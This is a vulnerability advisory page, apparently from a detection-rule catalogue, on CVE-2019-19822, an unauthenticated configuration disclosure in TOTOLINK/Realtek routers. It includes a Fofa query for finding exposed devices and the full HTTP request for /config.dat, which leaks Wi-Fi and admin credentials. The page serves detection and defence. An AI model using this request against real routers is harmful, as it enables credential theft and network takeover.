🔙 목록으로 돌아가기

CVE-2019-19822: TOTOLINK/Realtek Routers - Information Disclosure

TitleTOTOLINK/Realtek Routers - Information Disclosure
Authorritikchaddha
SeverityHigh
ImpactUnauthenticated attackers can retrieve the entire router configuration including Wi-Fi passwords, admin credentials, and network settings, enabling complete network takeover.
RemediationUpgrade to firmware versions beyond those listed as vulnerable, or replace affected devices with patched alternatives.
CVSS Score7.5
EPSS Score0.43036
CVE IDCVE-2019-19822
CWE IDCWE-306
Fofa Querytitle="totolink"
Tags cve cve2019 totolink realtek information-disclosure config boa

🔍 Vulnerability Description

A certain router administration interface using Realtek APMIB (e.g., on TOTOLINK models) allows unauthenticated remote attackers to disclose the entire router configuration, including sensitive credentials, via accessing the “config.dat” file. Affected devices include TOTOLINK A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, N100RE through 3.4.0, and other Realtek SDK-based devices.

🌐 HTTP Request

GET /config.dat HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-19822.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-19822.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A